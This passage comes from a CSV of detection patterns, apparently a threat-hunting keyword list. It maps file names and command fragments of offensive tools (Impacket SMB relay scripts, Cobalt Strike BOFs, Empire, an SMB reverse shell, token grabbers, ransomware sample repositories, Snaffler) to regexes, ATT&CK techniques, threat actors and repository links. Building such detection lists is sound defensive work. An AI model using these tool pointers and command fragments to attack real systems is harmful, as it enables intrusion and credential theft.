Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59715" "*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","59716" "*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59717" "*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59718" "*SMBRelayResponse*",".{0,1000}SMBRelayResponse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59719" "*smbrelayserver.*",".{0,1000}smbrelayserver\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","59720" "*smbrelayserver.py*",".{0,1000}smbrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59721" "*smbrelayx.py*",".{0,1000}smbrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59722" "*smb-reverse-shell.git*",".{0,1000}smb\-reverse\-shell\.git.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","59723" "*smb-reverse-shell-main*",".{0,1000}smb\-reverse\-shell\-main.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","59724" "*smbscan*",".{0,1000}smbscan.{0,1000}","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","APT22","Reconnaissance","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","N/A","1","61","18","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z","59725" 
"*smb-scanner*",".{0,1000}smb\-scanner.{0,1000}","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","N/A","1","61","18","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z","59726" "*smb-secrets-revealer.py*",".{0,1000}smb\-secrets\-revealer\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","59728" "*smbserver.py -payload*",".{0,1000}smbserver\.py\s\-payload.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","59729" "*smbserver.py -smb2support EXEGOL*",".{0,1000}smbserver\.py\s\-smb2support\sEXEGOL.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59730" "*smbserver.py*",".{0,1000}smbserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59731" "*smbsigning_check*",".{0,1000}smbsigning_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59732" "*smbspider *",".{0,1000}smbspider\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","59733" "*smbspider.py*",".{0,1000}smbspider\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","59734" "*smbsr.py*",".{0,1000}smbsr\.py.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","59735" "*smbsrfile_results.csv*",".{0,1000}smbsrfile_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","59736" "*Smbtouch.exe*",".{0,1000}Smbtouch\.exe.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detects whether the target is vulnerable to one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - 
TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","59737" "*Smbtouch-1.1.1.exe*",".{0,1000}Smbtouch\-1\.1\.1\.exe.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detects whether the target is vulnerable to one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","59738" "*Smbtouch-1.1.1.xml*",".{0,1000}Smbtouch\-1\.1\.1\.xml.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detects whether the target is vulnerable to one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","59739" "*SmbtouchScanner.py*",".{0,1000}SmbtouchScanner\.py.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detects whether the target is vulnerable to one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","59740" "*smbtrap-mitmproxy-inline*",".{0,1000}smbtrap\-mitmproxy\-inline.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - 
TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#content","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","59741" "*smicallef/spiderfoot*",".{0,1000}smicallef\/spiderfoot.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","59750" "*SMShell.sln*",".{0,1000}SMShell\.sln.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","59751" "*smtprelayclient.py*",".{0,1000}smtprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","59752" "*smtprelayclient.py*",".{0,1000}smtprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59753" "*smtp-user-enum * -M EXPN *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sEXPN\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59754" "*smtp-user-enum * -M RCPT *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sRCPT\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59755" "*smtp-user-enum * -M VRFY *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sVRFY\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 
- T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59756" "*smtp-user-enum*",".{0,1000}smtp\-user\-enum.{0,1000}","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59757" "*smtp-user-enum.py*",".{0,1000}smtp\-user\-enum\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","59758" "*Smug246/Luna-Grabber*",".{0,1000}Smug246\/Luna\-Grabber.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","59759" "*smukx@proton.me*",".{0,1000}smukx\@proton\.me.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#email","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","59760" "*smukx@protonmail.com*",".{0,1000}smukx\@protonmail\.com.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - 
T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#email","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","59761" "*SmutnyKobimtochukwu@protonmail.com*",".{0,1000}SmutnyKobimtochukwu\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","59762" "*sn.exe -k key.snk*",".{0,1000}sn\.exe\s\-k\skey\.snk.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","59763" "*SnaffCon/Snaffler*",".{0,1000}SnaffCon\/Snaffler.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59764" "*SnaffCore.csproj*",".{0,1000}SnaffCore\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - 